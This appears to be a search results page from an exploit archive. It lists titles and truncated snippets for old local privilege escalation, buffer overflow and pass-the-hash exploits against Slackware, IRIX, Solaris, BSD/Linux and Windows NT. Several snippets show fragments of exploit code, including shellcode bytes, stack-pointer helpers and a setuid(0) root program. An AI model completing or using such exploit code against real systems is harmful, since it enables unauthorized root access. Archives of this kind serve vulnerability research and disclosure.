2058 matches found
Slackware Linux 3.1/3.2 - 'color_xterm' Local Buffer Overflow (1)
source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. / exploit for colorxterm, modified by zgv / / original exploit coded by Ming Zhang for...
Slackware Linux 3.13.2 - color_xterm Local Buffer Overflow (2)
Slackware Linux 3.13.2 - colorxterm Local Buffer Overflow 2 / source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. / / colorxterm buffer...
SGI IRIX 6.2 - eject Local Privilege Escalation (1)
SGI IRIX 6.2 - eject Local Privilege Escalation 1 // source: https://www.securityfocus.com/bid/351/info A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the...
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA; / ps will grok this file for the exploit code / char envp="NLSPATH=/tmp/foo",0; ulong longp; uchar charp; / This will vary depending on your libc / ulong...
SGI IRIX 6.2 - day5notifier Local Privilege Escalation
SGI IRIX 6.2 - day5notifier Local Privilege Escalation !/bin/sh source: https://www.securityfocus.com/bid/345/info A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. day5notifier wisely...
SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution
source: https://www.securityfocus.com/bid/374/info A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed wi...
SGI IRIX 6.5.4 Solaris 2.5.1 - ps(1) Buffer Overflow
SGI IRIX 6.5.4 Solaris 2.5.1 - ps1 Buffer Overflow source: https://www.securityfocus.com/bid/220/info The ps command prints information about active processes on a system. Due to insufficient bounds checking on arguments supplied to ps, it is possible to overwrite the internal data space of the p...
BSDOS 2.1 DGUX 7.0 Debian 1.3 HP-UX 10.34 IBM AIX 4.2 SGI IRIX 6.4 Solaris 2.5.1 - usrbinX11xlock Local Privilege Escalation (2)
BSDOS 2.1 DGUX 7.0 Debian 1.3 HP-UX 10.34 IBM AIX 4.2 SGI IRIX 6.4 Solaris 2.5.1 - usrbinX11xlock Local Privilege Escalation 2 / source: https://www.securityfocus.com/bid/224/info The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow...
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client
source: https://www.securityfocus.com/bid/233/info A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the...
Microsoft Windows NT 4.0 SP5 Terminal Server 4.0 - Pass the Hash with Modified SMB Client
Microsoft Windows NT 4.0 SP5 Terminal Server 4.0 - Pass the Hash with Modified SMB Client source: https://www.securityfocus.com/bid/233/info A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the...
Solaris 2.4 - binfdformat Local Buffer Overflow
Solaris 2.4 - binfdformat Local Buffer Overflow --------------------------- lion24.c --------------------------------- / Solaris 2.4 / include include include include define BUFLENGTH 264 define EXTRA 36 define STACKOFFSET -56 define SPARCNOP 0xa61cc013 uchar sparcshellcode =...
HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service
source: https://www.securityfocus.com/bid/352/info Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot wh...
BSD / Linux - 'lpr' Local Privilege Escalation
-------------------------------------- linuxlprexploit.c ---------- include include include define DEFAULTOFFSET 50 define BUFFERSIZE 1023 long getespvoid asm"movl %esp,%eax\n"; void main char buff = NULL; unsigned long addrptr = NULL; char ptr = NULL; uchar execshell =...
SGI IRIX 5.3 - pkgadjust Local Privilege Escalation
SGI IRIX 5.3 - pkgadjust Local Privilege Escalation source: https://www.securityfocus.com/bid/419/info A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. % cat getroot.c int main setuid0...
Xt Library - Local Privilege Escalation
include include include define DEFAULTOFFSET 0 define BUFFERSIZE 1491 long getespvoid asm"movl %esp,%eax\n"; mainint argc, char argv char buff = NULL; unsigned long addrptr = NULL; char ptr = NULL; char execshell = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0...
BSD / Linux - 'umount' Local Privilege Escalation
/ Reminder - Be sure to fix the includes /str0ke / -------------------------------------- linuxumountexploit.c ---------- include include include include include include define PATHMOUNT "/bin/umount" define BUFFERSIZE 1024 define DEFAULTOFFSET 50 ulong getesp asm"movl %esp, %eax"; mainint argc,...
sudo.bin - NLSPATH Privilege Escalation
include include include include include define PATHSUDO "/usr/bin/sudo.bin" define BUFFERSIZE 1024 define DEFAULTOFFSET 50 ulong getesp asm"movl %esp, %eax"; mainint argc, char argv uchar execshell = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"...
NetMeeting Directory Traversal Vulnerability
Advisory ID Internal CORE-2003-0305-04 Advisory Information: Advisory ID: CORE-2003-0305-04 Bugtraq ID: 7931 CVE Name: None currently assigned. Title: NetMeeting Directory Traversal Vulnerability Class : Input validation error Remotely Exploitable: Yes Locally Exploitable: No Vendors Contacted:...